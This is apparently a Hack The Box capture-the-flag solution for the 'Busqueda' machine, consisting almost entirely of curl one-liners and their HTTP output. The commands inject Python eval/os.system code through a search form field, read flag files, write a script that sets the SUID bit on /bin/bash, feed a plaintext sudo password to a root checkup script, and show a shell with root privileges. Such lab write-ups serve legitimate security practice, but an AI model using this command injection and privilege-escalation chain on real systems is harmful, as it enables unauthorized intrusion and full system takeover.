hackthebox Busqueda EASY难度 一把梭哈

自动执行sudo命令,自动给sudo命令输入密码:jh1usoih2bkjaspwe92

curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo \"#\x21/bin/bash\nchmod %2bs /bin/bash\">full-checkup.sh;chmod %2bx full-checkup.sh;tac full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -pc \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search

curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo \"#\x21/bin/bash\nchmod %2bs /bin/bash\">full-checkup.sh;chmod %2bx full-checkup.sh;tac full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -pc \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search

root@fv-az455-564:/tmp# curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo chmod %2bs /bin/bash>full-checkup.sh;chmod %2bx full-checkup.sh;cat full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -pc \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search
*   Trying 10.10.11.208:80...
* Connected to 10.10.11.208 (10.10.11.208) port 80 (#0)
> POST /search HTTP/1.1
> Host: searcher.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 335
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 23 Apr 2023 14:10:42 GMT
< Server: Werkzeug/2.1.2 Python/3.10.6
< Content-Type: text/html; charset=utf-8
< Content-Length: 330
< Vary: Accept-Encoding
< 
07925555dcb0a45846a46b19d0d0e7c6
chmod +s /bin/bash
Script started, output log file is 'nz7'.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
$ [sudo] password for svc: 
Something went wrong
$ 
Script done.
6dd6c4de6c7e05fa4078393b510f4630
* Connection #0 to host 10.10.11.208 left intact
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root)root@fv-az455-564:/tmp# 

root@fv-az455-564:/tmp# curl -v -d "engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac /home/svc/user.txt;cd /tmp;echo \"#\x21/bin/bash\nchmod %2bs /bin/bash\">full-checkup.sh;chmod %2bx full-checkup.sh;tac full*;(echo sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup;sleep 0.2;echo jh1usoih2bkjaspwe92)|script nz7;bash -p -c \"tac /root/root.txt;id\"')))%2b'" -H "Host: searcher.htb" http://10.10.11.208/search
*   Trying 10.10.11.208:80...
* Connected to 10.10.11.208 (10.10.11.208) port 80 (#0)
> POST /search HTTP/1.1
> Host: searcher.htb
> User-Agent: curl/7.81.0
> Accept: */*
> Content-Length: 355
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 23 Apr 2023 14:37:06 GMT
< Server: Werkzeug/2.1.2 Python/3.10.6
< Content-Type: text/html; charset=utf-8
< Content-Length: 333
< Vary: Accept-Encoding
< 
4c1eba893e8a8a789221f03c11979c2e
chmod +s /bin/bash
#!/bin/bash
Script started, output log file is 'nz7'.
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
$ [sudo] password for svc: 

[+] Done!
$ 
Script done.
23bc68920b590506f48179a045787748
* Connection #0 to host 10.10.11.208 left intact
uid=1000(svc) gid=1000(svc) euid=0(root) egid=0(root) groups=0(root)root@fv-az455-564:/tmp#